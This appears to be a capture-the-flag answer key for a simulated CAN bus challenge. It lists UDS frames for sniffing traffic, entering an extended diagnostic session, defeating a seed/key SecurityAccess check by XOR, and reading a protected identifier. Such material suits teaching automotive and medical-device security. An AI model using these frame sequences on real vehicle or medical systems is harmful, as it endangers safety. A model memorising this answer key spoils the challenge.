63 lines
1.7 KiB
Markdown
63 lines
1.7 KiB
Markdown
# CAN Bus Implant — Solution
|
|
|
|
## Overview
|
|
|
|
Simulated CAN bus with background traffic and UDS (Unified Diagnostic Services) protocol. Player sniffs traffic to identify patterns, then injects UDS frames to gain security access and read a protected DID.
|
|
|
|
## Steps
|
|
|
|
1. Open two terminals — one for sniffing, one for injection:
|
|
|
|
```bash
|
|
# Terminal 1: Sniff
|
|
nc <host> 3600
|
|
|
|
# Terminal 2: Inject
|
|
nc <host> 3601
|
|
```
|
|
|
|
2. Observe traffic on the sniff port. Note the following patterns:
|
|
- `0x100`: Heartbeat (periodic counter)
|
|
- `0x200-0x203`: Sensor data (temperature, heart rate)
|
|
- `0x7DF`: OBD broadcast diagnostic request
|
|
- `0x7E0` → `0x7E8`: UDS request/response pair (periodic VIN read)
|
|
|
|
3. On the inject port, enter extended diagnostic session:
|
|
|
|
```
|
|
send 7E0 02 10 03 00 00 00 00 00
|
|
```
|
|
|
|
Response on sniff shows `0x7E8` with positive response `50 03`.
|
|
|
|
4. Request a security seed:
|
|
|
|
```
|
|
send 7E0 02 27 01 00 00 00 00 00
|
|
```
|
|
|
|
Response contains 4-byte seed: `67 01 XX XX XX XX`.
|
|
|
|
5. Compute the key by XORing each seed byte with `0x42`, then send:
|
|
|
|
```
|
|
send 7E0 06 27 02 KK KK KK KK 00
|
|
```
|
|
|
|
Positive response: `67 02`.
|
|
|
|
6. Read the flag from DID 0xFF01:
|
|
|
|
```
|
|
send 7E0 03 22 FF 01 00 00 00 00
|
|
```
|
|
|
|
Response contains the flag.
|
|
|
|
## Key Concepts
|
|
|
|
- **CAN bus**: Controller Area Network — no authentication, broadcast medium, used in vehicles and medical equipment
|
|
- **UDS (ISO 14229)**: Diagnostic protocol with services like DiagnosticSessionControl, SecurityAccess, ReadDataByIdentifier
|
|
- **SecurityAccess**: Challenge-response authentication — ECU sends seed, tester must compute correct key
|
|
- **Traffic analysis**: Identifying request/response patterns and protocol types from raw bus traffic
|